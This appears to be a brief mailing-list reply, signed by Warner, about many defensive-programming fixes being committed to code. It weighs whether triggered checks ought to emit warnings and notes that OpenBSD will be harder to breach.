: even then I would bet there are still other problems with the code. Yes. There are a boatload. And a bunch more just went in today. Many of them are very defensive programming, and seem to be somewhat sane. I'm not sure how many of them should have some kind of warning generated when they are triggered. It all depends on how paranoid you are :-). I don't have a good answer for that. At the very least OpenBSD will be much less likely to be breached, which is likely the most important thing. Warner